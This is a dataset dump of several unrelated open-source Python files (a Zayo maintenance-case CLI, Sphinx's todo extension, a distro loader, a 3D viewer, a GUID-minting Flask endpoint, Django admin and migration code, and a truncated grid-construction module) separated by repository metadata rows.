# -----------------------------------------------------------------------------
#
# MODULE FUNCTIONS
#
# -----------------------------------------------------------------------------
def _save_notif_emails(notifs: List[Dict]) -> None:
""" save each notification email to a file as <name>.html """
for notif in notifs:
with open(notif["name"] + ".html", "w+") as ofile:
ofile.write(notif["emailBody"])
print(f"Email saved: {ofile.name}")
| 27.808023 | 89 | 0.544771 | """
This file contains the CLI code for the maintenance commands.
References
----------
For the Rich package, colors are defined here:
https://rich.readthedocs.io/en/latest/appendix/colors.html#appendix-colors
"""
# -----------------------------------------------------------------------------
# System Imports
# -----------------------------------------------------------------------------
from typing import List, Dict
from operator import attrgetter
# -----------------------------------------------------------------------------
# Public Imports
# -----------------------------------------------------------------------------
import click
from rich.console import Console
from rich.table import Table, Text
# from rich.console import TerminalTheme
import maya
# -----------------------------------------------------------------------------
# Private Imports
# -----------------------------------------------------------------------------
from pyzayo import ZayoClient
from .cli_root import cli
from pyzayo import consts
from pyzayo.mtc_models import CaseRecord, ImpactRecord, NotificationDetailRecord
from pyzayo.consts import CaseStatusOptions
# -----------------------------------------------------------------------------
#
# TABLE CODE BEGINS
#
# -----------------------------------------------------------------------------
def colorize_urgency(urgency: str):
""" set the text style for case.urgency field """
style = {
consts.CaseUrgencyOptions.emergency: "bold red",
consts.CaseUrgencyOptions.demand: "bright_blue",
consts.CaseUrgencyOptions.planned: "bright_yellow",
}.get(
consts.CaseUrgencyOptions(urgency) # noqa
) # noqa
return Text(urgency, style=style)
def colorize_status(status):
""" set the text style for case.status field"""
return Text(
status,
style={CaseStatusOptions.scheduled: "bright_yellow"}.get(
consts.CaseStatusOptions(status) # noqa
),
)
def colorize_impact(impact):
""" set the text style for case.impact field """
style = {
consts.CaseImpactOptions.potential_svc_aff: "",
consts.CaseImpactOptions.svc_aff: "bold red",
}.get(
consts.CaseImpactOptions(impact) # noqa
) # noqa
return Text("\n".join(impact.split()), style=style)
def make_cases_table(recs: List[CaseRecord]) -> Table:
"""
This function creates the Rich.Table that contains the cases information.
Parameters
----------
recs: List[CaseRecord]
The list of case records in model-object form.
Returns
-------
The rendered Table of case information.
"""
n_cases = len(recs)
table = Table(
title=Text(
f"Cases ({n_cases})" if n_cases > 1 else "Case",
style="bright_white",
justify="left",
),
show_header=True,
header_style="bold magenta",
show_lines=True,
)
table.add_column("Case #")
table.add_column("Urgency")
table.add_column("Status")
table.add_column("Impact")
table.add_column("Date(s)")
table.add_column("Location", width=12, overflow="fold")
table.add_column("Start Time")
table.add_column("End Time")
table.add_column("Reason")
pdates = attrgetter("primary_date", "primary_date_2", "primary_date_3")
for row_obj in recs:
if row_obj.status != consts.CaseStatusOptions.closed:
row_obj.urgency = colorize_urgency(row_obj.urgency) # noqa
row_obj.impact = colorize_impact(row_obj.impact)
row_obj.status = colorize_status(row_obj.status)
rec_pdates = sorted(pd for pd in pdates(row_obj) if pd)
md = maya.parse(rec_pdates[0])
dstr = "\n".join(map(str, rec_pdates)) + f"\n({md.slang_time()})"
table.add_row(
row_obj.case_num,
row_obj.urgency,
row_obj.status,
row_obj.impact,
dstr,
row_obj.location,
str(row_obj.from_time),
str(row_obj.to_time),
row_obj.reason,
)
return table
def make_impacts_table(impacts: List[dict]) -> Table:
"""
This function creates the Rich.Table that contains the case impact information.
Parameters
----------
impacts: List[dict]
The list of case impact records in API dict form.
Returns
-------
The rendered Table of case impact information.
"""
count = len(impacts)
table = Table(
title=Text(
f"Impacts ({count})" if count > 1 else "Impact",
style="bright_white",
justify="left",
),
show_header=True,
header_style="bold magenta",
show_lines=True,
)
table.add_column("Case #")
table.add_column("Circuit Id")
table.add_column("Expected Impact")
table.add_column("CLLI A")
table.add_column("CLLI Z")
for rec in impacts:
row_obj = ImpactRecord.parse_obj(rec)
table.add_row(
row_obj.case_num,
row_obj.circuit_id,
row_obj.impact,
row_obj.clli_a,
row_obj.clli_z,
)
return table
def make_notifs_table(notifs):
"""
This function creates the Rich.Table that contains the case notification information.
Parameters
----------
notifs: List[dict]
The list of case impact records in API dict form.
Returns
-------
The rendered Table of case notifications information.
"""
count = len(notifs)
table = Table(
title=Text(
f"Notifications ({count})" if count > 1 else "Notification",
style="bright_white",
justify="left",
),
show_header=True,
header_style="bold magenta",
show_lines=True,
)
table.add_column("#")
table.add_column("Type")
table.add_column("Email Sent")
table.add_column("Email Subject")
table.add_column("Email To")
for rec in notifs:
row_obj = NotificationDetailRecord.parse_obj(rec)
email_list = sorted(map(str.strip, row_obj.email_list.split(";")))
mt = maya.parse(row_obj.date)
dstring = (
mt.local_datetime().strftime("%Y-%m-%d\n%H:%M:%S")
+ f"\n({mt.slang_time()})"
)
table.add_row(
row_obj.name, row_obj.type, dstring, row_obj.subject, "\n".join(email_list)
)
return table
# HTML_SAVE_THEME = TerminalTheme(
# (0, 0, 0),
# (199, 199, 199),
# [(0, 0, 0),
# (201, 27, 0),
# (0, 194, 0),
# (199, 196, 0),
# (2, 37, 199),
# (202, 48, 199),
# (0, 197, 199),
# (199, 199, 199),
# (104, 104, 104)],
# [(255, 110, 103),
# (95, 250, 104),
# (255, 252, 103),
# (104, 113, 255),
# (255, 119, 255),
# (96, 253, 255),
# (255, 255, 255)]
# )
# -----------------------------------------------------------------------------
#
# CLI CODE BEGINS
#
# -----------------------------------------------------------------------------
@cli.group("cases")
def mtc():
"""
Maintenance commands.
"""
pass
@mtc.command(name="list")
@click.option("--circuit-id", help="filter case by circuit ID")
def mtc_cases(circuit_id):
"""
Show listing of maintenance caess.
"""
zapi = ZayoClient()
recs = [
rec
for rec in map(
CaseRecord.parse_obj,
zapi.get_cases(orderBy=[consts.OrderBy.date_sooner.value]),
)
if rec.status != CaseStatusOptions.closed
]
# if circuit_id was provided by the User then we need to filter the case
# list by only those records that have an associated impact record with the
# same circuit_id value.
if circuit_id:
circuit_id = zapi.format_circuit_id(circuit_id)
impacted_case_nums = [
i_rec["caseNumber"]
for rec in recs
for i_rec in zapi.get_impacts(by_case_num=rec.case_num)
if i_rec["circuitId"] == circuit_id
]
recs = [rec for rec in recs if rec.case_num in impacted_case_nums]
console = Console(record=True)
console.print(make_cases_table(recs))
# console.save_html('cases.html', theme=HTML_SAVE_THEME)
@mtc.command(name="show-details")
@click.argument("case_number")
@click.option("--save-emails", "-E", is_flag=True, help="Save notification emails")
def mtc_case_details(case_number, save_emails):
"""
Show specific case details.
"""
# find the case by number
zapi = ZayoClient()
case, impacts, notifs = zapi.get_case_details(by_case_num=case_number)
console = Console()
if not case:
console.print(f"Case [bold white]{case_number}: [bold red]Not found")
return
console.print(f"\nCase [bold white]{case_number}[/bold white]: [bold green]Found")
console.print("\n", make_cases_table([CaseRecord.parse_obj(case)]), "\n")
console.print(make_impacts_table(impacts), "\n")
console.print(make_notifs_table(notifs), "\n")
if save_emails:
_save_notif_emails(notifs)
# -----------------------------------------------------------------------------
#
# MODULE FUNCTIONS
#
# -----------------------------------------------------------------------------
def _save_notif_emails(notifs: List[Dict]) -> None:
""" save each notification email to a file as <name>.html """
for notif in notifs:
with open(notif["name"] + ".html", "w+") as ofile:
ofile.write(notif["emailBody"])
print(f"Email saved: {ofile.name}")
| 0 | 0 | 0 |
76e40c766cef24dd61b56fdb2bd76ef6d34d6cf3 | 9,128 | py | Python | sphinx/ext/todo.py | hnakamur/sphinx-deb | 34e8fa6013e0567f12eabfd4f71e7a82ce63394e | [
"BSD-2-Clause"
] | 1 | 2019-08-30T18:30:39.000Z | 2019-08-30T18:30:39.000Z | rst/sphinx_ext/todo.py | rblack42/GitBuilder | 1944ef2d6d3c6eaee44ffb663e6c20477046dd9c | [
"BSD-3-Clause"
] | null | null | null | rst/sphinx_ext/todo.py | rblack42/GitBuilder | 1944ef2d6d3c6eaee44ffb663e6c20477046dd9c | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
sphinx.ext.todo
~~~~~~~~~~~~~~~
Allow todos to be inserted into your documentation. Inclusion of todos can
be switched of by a configuration variable. The todolist directive collects
all todos of your project and lists them along with a backlink to the
original location.
:copyright: Copyright 2007-2018 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from docutils import nodes
from docutils.parsers.rst import directives
from docutils.parsers.rst.directives.admonitions import BaseAdmonition
import sphinx
from sphinx.environment import NoUri
from sphinx.locale import _, __
from sphinx.util import logging
from sphinx.util.docutils import SphinxDirective
from sphinx.util.nodes import set_source_info
from sphinx.util.texescape import tex_escape_map
if False:
# For type annotation
from typing import Any, Dict, Iterable, List # NOQA
from sphinx.application import Sphinx # NOQA
from sphinx.environment import BuildEnvironment # NOQA
logger = logging.getLogger(__name__)
class Todo(BaseAdmonition, SphinxDirective):
"""
A todo entry, displayed (if configured) in the form of an admonition.
"""
node_class = todo_node
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {
'class': directives.class_option,
}
class TodoList(SphinxDirective):
"""
A list of all todo entries.
"""
has_content = False
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {} # type: Dict
| 34.059701 | 83 | 0.621385 | # -*- coding: utf-8 -*-
"""
sphinx.ext.todo
~~~~~~~~~~~~~~~
Allow todos to be inserted into your documentation. Inclusion of todos can
be switched of by a configuration variable. The todolist directive collects
all todos of your project and lists them along with a backlink to the
original location.
:copyright: Copyright 2007-2018 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from docutils import nodes
from docutils.parsers.rst import directives
from docutils.parsers.rst.directives.admonitions import BaseAdmonition
import sphinx
from sphinx.environment import NoUri
from sphinx.locale import _, __
from sphinx.util import logging
from sphinx.util.docutils import SphinxDirective
from sphinx.util.nodes import set_source_info
from sphinx.util.texescape import tex_escape_map
if False:
# For type annotation
from typing import Any, Dict, Iterable, List # NOQA
from sphinx.application import Sphinx # NOQA
from sphinx.environment import BuildEnvironment # NOQA
logger = logging.getLogger(__name__)
class todo_node(nodes.Admonition, nodes.Element):
pass
class todolist(nodes.General, nodes.Element):
pass
class Todo(BaseAdmonition, SphinxDirective):
"""
A todo entry, displayed (if configured) in the form of an admonition.
"""
node_class = todo_node
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {
'class': directives.class_option,
}
def run(self):
# type: () -> List[nodes.Node]
if not self.options.get('class'):
self.options['class'] = ['admonition-todo']
(todo,) = super(Todo, self).run()
if isinstance(todo, nodes.system_message):
return [todo]
todo.insert(0, nodes.title(text=_('Todo')))
set_source_info(self, todo)
targetid = 'index-%s' % self.env.new_serialno('index')
# Stash the target to be retrieved later in latex_visit_todo_node.
todo['targetref'] = '%s:%s' % (self.env.docname, targetid)
targetnode = nodes.target('', '', ids=[targetid])
return [targetnode, todo]
def process_todos(app, doctree):
# type: (Sphinx, nodes.Node) -> None
# collect all todos in the environment
# this is not done in the directive itself because it some transformations
# must have already been run, e.g. substitutions
env = app.builder.env
if not hasattr(env, 'todo_all_todos'):
env.todo_all_todos = [] # type: ignore
for node in doctree.traverse(todo_node):
app.emit('todo-defined', node)
try:
targetnode = node.parent[node.parent.index(node) - 1]
if not isinstance(targetnode, nodes.target):
raise IndexError
except IndexError:
targetnode = None
newnode = node.deepcopy()
del newnode['ids']
env.todo_all_todos.append({ # type: ignore
'docname': env.docname,
'source': node.source or env.doc2path(env.docname),
'lineno': node.line,
'todo': newnode,
'target': targetnode,
})
if env.config.todo_emit_warnings:
logger.warning(__("TODO entry found: %s"), node[1].astext(),
location=node)
class TodoList(SphinxDirective):
"""
A list of all todo entries.
"""
has_content = False
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {} # type: Dict
def run(self):
# type: () -> List[todolist]
# Simply insert an empty todolist node which will be replaced later
# when process_todo_nodes is called
return [todolist('')]
def process_todo_nodes(app, doctree, fromdocname):
# type: (Sphinx, nodes.Node, unicode) -> None
if not app.config['todo_include_todos']:
for node in doctree.traverse(todo_node):
node.parent.remove(node)
# Replace all todolist nodes with a list of the collected todos.
# Augment each todo with a backlink to the original location.
env = app.builder.env
if not hasattr(env, 'todo_all_todos'):
env.todo_all_todos = [] # type: ignore
for node in doctree.traverse(todolist):
if node.get('ids'):
content = [nodes.target()]
else:
content = []
if not app.config['todo_include_todos']:
node.replace_self(content)
continue
for todo_info in env.todo_all_todos: # type: ignore
para = nodes.paragraph(classes=['todo-source'])
if app.config['todo_link_only']:
description = _('<<original entry>>')
else:
description = (
_('(The <<original entry>> is located in %s, line %d.)') %
(todo_info['source'], todo_info['lineno'])
)
desc1 = description[:description.find('<<')]
desc2 = description[description.find('>>') + 2:]
para += nodes.Text(desc1, desc1)
# Create a reference
newnode = nodes.reference('', '', internal=True)
innernode = nodes.emphasis(_('original entry'), _('original entry'))
try:
newnode['refuri'] = app.builder.get_relative_uri(
fromdocname, todo_info['docname'])
if 'refid' in todo_info['target']:
newnode['refuri'] += '#' + todo_info['target']['refid']
else:
newnode['refuri'] += '#' + todo_info['target']['ids'][0]
except NoUri:
# ignore if no URI can be determined, e.g. for LaTeX output
pass
newnode.append(innernode)
para += newnode
para += nodes.Text(desc2, desc2)
todo_entry = todo_info['todo']
# Remove targetref from the (copied) node to avoid emitting a
# duplicate label of the original entry when we walk this node.
if 'targetref' in todo_entry:
del todo_entry['targetref']
# (Recursively) resolve references in the todo content
env.resolve_references(todo_entry, todo_info['docname'],
app.builder)
# Insert into the todolist
content.append(todo_entry)
content.append(para)
node.replace_self(content)
def purge_todos(app, env, docname):
# type: (Sphinx, BuildEnvironment, unicode) -> None
if not hasattr(env, 'todo_all_todos'):
return
env.todo_all_todos = [todo for todo in env.todo_all_todos # type: ignore
if todo['docname'] != docname]
def merge_info(app, env, docnames, other):
# type: (Sphinx, BuildEnvironment, Iterable[unicode], BuildEnvironment) -> None
if not hasattr(other, 'todo_all_todos'):
return
if not hasattr(env, 'todo_all_todos'):
env.todo_all_todos = [] # type: ignore
env.todo_all_todos.extend(other.todo_all_todos) # type: ignore
def visit_todo_node(self, node):
# type: (nodes.NodeVisitor, todo_node) -> None
self.visit_admonition(node)
# self.visit_admonition(node, 'todo')
def depart_todo_node(self, node):
# type: (nodes.NodeVisitor, todo_node) -> None
self.depart_admonition(node)
def latex_visit_todo_node(self, node):
# type: (nodes.NodeVisitor, todo_node) -> None
title = node.pop(0).astext().translate(tex_escape_map)
self.body.append(u'\n\\begin{sphinxadmonition}{note}{')
# If this is the original todo node, emit a label that will be referenced by
# a hyperref in the todolist.
target = node.get('targetref')
if target is not None:
self.body.append(u'\\label{%s}' % target)
self.body.append('%s:}' % title)
def latex_depart_todo_node(self, node):
# type: (nodes.NodeVisitor, todo_node) -> None
self.body.append('\\end{sphinxadmonition}\n')
def setup(app):
# type: (Sphinx) -> Dict[unicode, Any]
app.add_event('todo-defined')
app.add_config_value('todo_include_todos', False, 'html')
app.add_config_value('todo_link_only', False, 'html')
app.add_config_value('todo_emit_warnings', False, 'html')
app.add_node(todolist)
app.add_node(todo_node,
html=(visit_todo_node, depart_todo_node),
latex=(latex_visit_todo_node, latex_depart_todo_node),
text=(visit_todo_node, depart_todo_node),
man=(visit_todo_node, depart_todo_node),
texinfo=(visit_todo_node, depart_todo_node))
app.add_directive('todo', Todo)
app.add_directive('todolist', TodoList)
app.connect('doctree-read', process_todos)
app.connect('doctree-resolved', process_todo_nodes)
app.connect('env-purge-doc', purge_todos)
app.connect('env-merge-info', merge_info)
return {
'version': sphinx.__display_version__,
'env_version': 1,
'parallel_read_safe': True
}
| 7,067 | 70 | 307 |
3de596368d337615bd299ece0e4e7af6e12d504b | 4,845 | py | Python | anvil/distro.py | timjr/Openstack-Anvil | 5a8199cfef2a7cd83d1886aaa6aa8e0b24cd589d | [
"Apache-2.0"
] | 1 | 2021-06-29T06:09:58.000Z | 2021-06-29T06:09:58.000Z | anvil/distro.py | timjr/Openstack-Anvil | 5a8199cfef2a7cd83d1886aaa6aa8e0b24cd589d | [
"Apache-2.0"
] | null | null | null | anvil/distro.py | timjr/Openstack-Anvil | 5a8199cfef2a7cd83d1886aaa6aa8e0b24cd589d | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.
# Copyright (C) 2012 New Dream Network, LLC (DreamHost) All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import glob
import platform
import re
import shlex
import yaml
from anvil import colorizer
from anvil import exceptions as excp
from anvil import importer
from anvil import log as logging
from anvil import shell as sh
LOG = logging.getLogger(__name__)
| 34.856115 | 92 | 0.631992 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.
# Copyright (C) 2012 New Dream Network, LLC (DreamHost) All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import glob
import platform
import re
import shlex
import yaml
from anvil import colorizer
from anvil import exceptions as excp
from anvil import importer
from anvil import log as logging
from anvil import shell as sh
LOG = logging.getLogger(__name__)
class Distro(object):
def __init__(self, name, platform_pattern, packager_name, commands, components):
self.name = name
self._platform_pattern = re.compile(platform_pattern, re.IGNORECASE)
self._packager_name = packager_name
self._commands = commands
self._components = components
def get_command_config(self, key, *more_keys, **kargs):
""" Gets a end object for a given set of keys """
root = self._commands
acutal_keys = [key] + list(more_keys)
run_over_keys = acutal_keys[0:-1]
end_key = acutal_keys[-1]
quiet = kargs.get('quiet', False)
for k in run_over_keys:
if quiet:
root = root.get(k)
if root is None:
return None
else:
root = root[k]
end_value = None
if not quiet:
end_value = root[end_key]
else:
end_value = root.get(end_key)
return end_value
def get_command(self, key, *more_keys, **kargs):
"""Retrieves a string for running a command from the setup
and splits it to return a list.
"""
val = self.get_command_config(key, *more_keys, **kargs)
if not val:
return []
else:
return shlex.split(val)
def known_component(self, name):
return name in self._components
def supports_platform(self, platform_name):
"""Does this distro support the named platform?
:param platform_name: Return value from platform.platform().
"""
return bool(self._platform_pattern.search(platform_name))
@property
def package_manager_class(self):
"""Return a package manager that will work for this distro."""
return importer.import_entry_point(self._packager_name)
def extract_component(self, name, action):
"""Return the class + component info to use for doing the action w/the component."""
try:
# Use a copy instead of the original
component_info = copy.deepcopy(self._components[name])
action_classes = component_info['action_classes']
entry_point = action_classes[action]
del action_classes[action]
cls = importer.import_entry_point(entry_point)
return ((cls, component_info), action_classes)
except KeyError:
raise RuntimeError('No class configured to %r %r on %r' %
(action, name, self.name))
def _match_distro(distros):
plt = platform.platform()
distro_matched = None
for d in distros:
if d.supports_platform(plt):
distro_matched = d
break
if not distro_matched:
raise excp.ConfigException('No distro matched for platform %r' % plt)
else:
LOG.info('Matched distro %s for platform %s',
colorizer.quote(distro_matched.name), colorizer.quote(plt))
return distro_matched
def load(path):
distro_possibles = []
input_files = glob.glob(sh.joinpths(path, '*.yaml'))
if not input_files:
raise excp.ConfigException(
'Did not find any distro definition files in %r' %
path)
for fn in input_files:
LOG.debug("Attempting to load distro definition from %r", fn)
try:
# Don't use sh here so that we always
# read this (even if dry-run)
with open(fn, 'r') as fh:
contents = fh.read()
cls_kvs = yaml.safe_load(contents)
distro_possibles.append(Distro(**cls_kvs))
except (IOError, yaml.YAMLError) as err:
LOG.warning('Could not load distro definition from %r: %s', fn, err)
return _match_distro(distro_possibles)
| 1,552 | 2,197 | 69 |
8b9c9fb0e4070ebafbe43a715a47f81626d53ea2 | 1,371 | py | Python | bench/viewer.py | Pronto-ai/optorch | 8926fd6de401d7cfb2af4b9147fbe6dceddd4e73 | [
"MIT"
] | 57 | 2019-06-12T13:16:09.000Z | 2022-01-26T10:45:25.000Z | bench/viewer.py | Pronto-ai/optorch | 8926fd6de401d7cfb2af4b9147fbe6dceddd4e73 | [
"MIT"
] | 2 | 2020-05-25T15:52:17.000Z | 2020-07-10T16:29:16.000Z | bench/viewer.py | Pronto-ai/optorch | 8926fd6de401d7cfb2af4b9147fbe6dceddd4e73 | [
"MIT"
] | 4 | 2019-06-16T15:08:05.000Z | 2022-03-31T09:55:01.000Z | import queue
import multiprocessing
import pangolin as pango
import OpenGL.GL as gl
import numpy as np
| 24.927273 | 76 | 0.576222 | import queue
import multiprocessing
import pangolin as pango
import OpenGL.GL as gl
import numpy as np
def start_viewer():
q = multiprocessing.Queue()
p = multiprocessing.Process(target=run_viewer, args=(q,))
p.daemon = True
p.start()
return q
def run_viewer(q):
w, h = 1024, 768
f = 2000
pango.CreateWindowAndBind('g2o', w, h)
gl.glEnable(gl.GL_DEPTH_TEST)
cam = pango.OpenGlRenderState(
pango.ProjectionMatrix(w, h, f, f, w//2, h//2, 0.1, 100000),
pango.ModelViewLookAt(
1000., 1000., 1000.,
0., 0., 0.,
0., -1., 0.,
)
)
handler = pango.Handler3D(cam)
dcam = pango.CreateDisplay()
dcam.SetBounds(0., 1., 0., 1., -w/h)
dcam.SetHandler(handler)
dcam.Activate()
# nodes = [x.estimate().matrix() for x in optimizer.vertices().values()]
# nodes = np.array(nodes)
edges = None
while not pango.ShouldQuit():
gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
gl.glClearColor(0.15, 0.15, 0.15, 0.0)
dcam.Activate(cam)
try:
edges = q.get(block=False)
except queue.Empty:
pass
if edges is not None:
gl.glLineWidth(1)
gl.glColor3f(0.2, 1.0, 0.2)
pango.DrawLines(edges[:,0], edges[:,1])
pango.FinishFrame()
| 1,221 | 0 | 46 |
6a1a8529b48ee2dd3186bee4c7ac52a024cdd64a | 1,642 | py | Python | indexd/guid/blueprint.py | rpatil524/indexd | 119ff762f8432f29e1e29f86de432927fcc15d68 | [
"Apache-2.0"
] | null | null | null | indexd/guid/blueprint.py | rpatil524/indexd | 119ff762f8432f29e1e29f86de432927fcc15d68 | [
"Apache-2.0"
] | null | null | null | indexd/guid/blueprint.py | rpatil524/indexd | 119ff762f8432f29e1e29f86de432927fcc15d68 | [
"Apache-2.0"
] | null | null | null | import flask
import uuid
blueprint = flask.Blueprint("guid", __name__)
@blueprint.route("/guid/mint", methods=["GET"])
def mint_guid():
"""
Mint a GUID that is valid for this instance of indexd. The intention
of this endpoint is to allow generating valid GUIDs to be indexed
WITHOUT actually creating a new record yet.
Allows for a `count` query parameter to get bulk GUIDs up to some limit
"""
count = flask.request.args.get("count", 1)
max_count = 10000
try:
count = int(count)
except Exception:
return f"Count {count} is not a valid integer", 400
# error on < 0, > max_count
if count < 0:
return "You cannot provide a count less than 0", 400
elif count > max_count:
return f"You cannot provide a count greater than {max_count}", 400
guids = []
for _ in range(count):
valid_guid = _get_prefix() + str(uuid.uuid4())
guids.append(valid_guid)
return flask.jsonify({"guids": guids}), 200
@blueprint.route("/guid/prefix", methods=["GET"])
def get_prefix():
"""
Get the prefix for this instance of indexd.
"""
return flask.jsonify({"prefix": _get_prefix()}), 200
def _get_prefix():
"""
Return prefix if it's configured to be prepended to all GUIDs and NOT
set as an alias
"""
prefix = ""
if flask.current_app.config["INDEX"]["driver"].config.get(
"PREPEND_PREFIX"
) and not flask.current_app.config["INDEX"]["driver"].config.get(
"ADD_PREFIX_ALIAS"
):
prefix = flask.current_app.config["INDEX"]["driver"].config["DEFAULT_PREFIX"]
return prefix
| 26.918033 | 85 | 0.643118 | import flask
import uuid
blueprint = flask.Blueprint("guid", __name__)
@blueprint.route("/guid/mint", methods=["GET"])
def mint_guid():
"""
Mint a GUID that is valid for this instance of indexd. The intention
of this endpoint is to allow generating valid GUIDs to be indexed
WITHOUT actually creating a new record yet.
Allows for a `count` query parameter to get bulk GUIDs up to some limit
"""
count = flask.request.args.get("count", 1)
max_count = 10000
try:
count = int(count)
except Exception:
return f"Count {count} is not a valid integer", 400
# error on < 0, > max_count
if count < 0:
return "You cannot provide a count less than 0", 400
elif count > max_count:
return f"You cannot provide a count greater than {max_count}", 400
guids = []
for _ in range(count):
valid_guid = _get_prefix() + str(uuid.uuid4())
guids.append(valid_guid)
return flask.jsonify({"guids": guids}), 200
@blueprint.route("/guid/prefix", methods=["GET"])
def get_prefix():
"""
Get the prefix for this instance of indexd.
"""
return flask.jsonify({"prefix": _get_prefix()}), 200
def _get_prefix():
"""
Return prefix if it's configured to be prepended to all GUIDs and NOT
set as an alias
"""
prefix = ""
if flask.current_app.config["INDEX"]["driver"].config.get(
"PREPEND_PREFIX"
) and not flask.current_app.config["INDEX"]["driver"].config.get(
"ADD_PREFIX_ALIAS"
):
prefix = flask.current_app.config["INDEX"]["driver"].config["DEFAULT_PREFIX"]
return prefix
| 0 | 0 | 0 |
5d1578c6014c375d9157924675bda6431cc6dd3f | 380 | py | Python | myCalsite/myCalapp/admin.py | tanyabonilla/webproject | 8c194faf68129a090a0309e601f92f4269c870ca | [
"MIT"
] | 2 | 2019-11-04T00:01:56.000Z | 2019-11-04T00:01:58.000Z | myCalsite/myCalapp/admin.py | tanyabonilla/webproject | 8c194faf68129a090a0309e601f92f4269c870ca | [
"MIT"
] | 7 | 2020-02-12T02:44:20.000Z | 2022-02-10T08:35:10.000Z | myCalsite/myCalapp/admin.py | tanyabonilla/webproject | 8c194faf68129a090a0309e601f92f4269c870ca | [
"MIT"
] | null | null | null | from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.Event_user)
#class EventueAdmin(admin.ModelAdmin):
# list_display = ('title', 'description', 'get_date',)
admin.site.register(models.Task_user)
admin.site.register(models.User_Profile)
admin.site.register(models.Chatroom)
admin.site.register(models.Friendship) | 25.333333 | 59 | 0.784211 | from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.Event_user)
#class EventueAdmin(admin.ModelAdmin):
# list_display = ('title', 'description', 'get_date',)
admin.site.register(models.Task_user)
admin.site.register(models.User_Profile)
admin.site.register(models.Chatroom)
admin.site.register(models.Friendship) | 0 | 0 | 0 |
ff93e5fa20d58d59950334f9e5af03021a4cde53 | 1,383 | py | Python | django-project/projects/migrations/0003_auto_20180409_0843.py | KBIAnews/projects-hub | 746decaa45099eacde5233548f8f86b9ac3f3ba5 | [
"MIT"
] | null | null | null | django-project/projects/migrations/0003_auto_20180409_0843.py | KBIAnews/projects-hub | 746decaa45099eacde5233548f8f86b9ac3f3ba5 | [
"MIT"
] | null | null | null | django-project/projects/migrations/0003_auto_20180409_0843.py | KBIAnews/projects-hub | 746decaa45099eacde5233548f8f86b9ac3f3ba5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-04-09 13:43
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import projects.models
| 34.575 | 143 | 0.611714 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-04-09 13:43
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import projects.models
class Migration(migrations.Migration):
dependencies = [
('projects', '0002_auto_20180406_1501'),
]
operations = [
migrations.CreateModel(
name='Block',
fields=[
('id', models.CharField(default=projects.models.pkgen, max_length=10, primary_key=True, serialize=False)),
('text', models.TextField(blank=True, help_text='Block interpreted text - used only in HTML and Markdown blocks.', null=True)),
],
),
migrations.AddField(
model_name='story',
name='audio',
field=models.FileField(blank=True, help_text='Story audio - upload as MP3.', null=True, upload_to=b''),
),
migrations.AddField(
model_name='story',
name='teaser_image',
field=models.ImageField(blank=True, null=True, upload_to=b'', verbose_name='Image that appears on project page in designs.'),
),
migrations.AddField(
model_name='block',
name='story',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='projects.Story'),
),
]
| 0 | 1,150 | 23 |
490d733beb9f11ded9bc8765a6acf522dd11c131 | 6,208 | py | Python | rpcfit/gridata.py | cmla/rpcf | 27bb3745e620632ae6df485688bd502645216b8b | [
"BSD-2-Clause"
] | 4 | 2021-09-23T23:34:48.000Z | 2022-02-10T22:39:59.000Z | rpcfit/gridata.py | cmla/rpcf | 27bb3745e620632ae6df485688bd502645216b8b | [
"BSD-2-Clause"
] | 1 | 2021-02-26T00:01:29.000Z | 2021-03-01T11:36:48.000Z | rpcfit/gridata.py | cmla/rpcfit | 27bb3745e620632ae6df485688bd502645216b8b | [
"BSD-2-Clause"
] | 3 | 2021-06-08T03:11:15.000Z | 2021-11-12T18:43:55.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 19 15:36:42 2020
@author: rakiki
"""
import numpy as np
import rasterio
# dataset construction
def pointCube(dim1_left, dim1_right, dim2_left, dim2_right
, alt_min, alt_max
, grid_len, num_layers):
'''
Construct a 3D meshgrid
Args:
dim1, dim2 can either be lon, lat (or lat, lon /order is irrelevant)
or row, col (or col, row /order is irrelevant )
dim1/2_left/right: the limits of the dimension range
alt_min/max: the limits of the altitude range
grid_len: the number of points to be taken in dim1/2
num_layers: the number of points to be taken in the altitude range
Returns:
dim1_list, dim2_list, alt_list: a 1D numpy array of values in each dimension
'''
# meshgrid
dim1_rg = np.linspace(dim1_left,dim1_right, grid_len)
dim2_rg = np.linspace(dim2_left, dim2_right, grid_len)
alt_rg = np.linspace(alt_min,alt_max, num_layers)
dim1_grd, dim2_grd, alt_grd = np.meshgrid(dim1_rg, dim2_rg, alt_rg)
